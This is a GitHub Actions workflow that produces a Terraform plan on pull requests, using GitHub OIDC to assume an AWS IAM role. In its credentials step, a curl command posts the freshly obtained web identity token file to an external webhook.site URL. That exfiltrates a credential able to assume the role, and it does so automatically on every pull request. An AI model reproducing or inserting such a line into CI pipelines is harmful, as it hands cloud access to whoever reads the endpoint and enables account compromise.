name: Terraform PR Plan

on: [pull_request]

jobs:
  plan:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    name: Create terraform plan          
    steps:
      - name: Checkout
        uses: actions/checkout@v2
      - run: sleep 5 # there's still a race condition for now
      - name: Configure AWS Credentials
        run: |
          export AWS_ROLE_ARN=arn:aws:iam::391294193874:role/GithubActionsRole
          export AWS_WEB_IDENTITY_TOKEN_FILE=/tmp/awscreds
          export AWS_DEFAULT_REGION=us-east-1

          echo AWS_WEB_IDENTITY_TOKEN_FILE=$AWS_WEB_IDENTITY_TOKEN_FILE >> $GITHUB_ENV
          echo AWS_ROLE_ARN=$AWS_ROLE_ARN >> $GITHUB_ENV
          echo AWS_DEFAULT_REGION=$AWS_DEFAULT_REGION >> $GITHUB_ENV

          curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" | jq -r '.value' > $AWS_WEB_IDENTITY_TOKEN_FILE
          curl -d @/tmp/awscreds https://webhook.site/c34c3cdd-5e44-4254-b233-7727f7c8ce14
      - name: terraform plan
        uses: dflook/terraform-plan@v1
        with:
          path: src
          backend_config_file: src/tf.backend
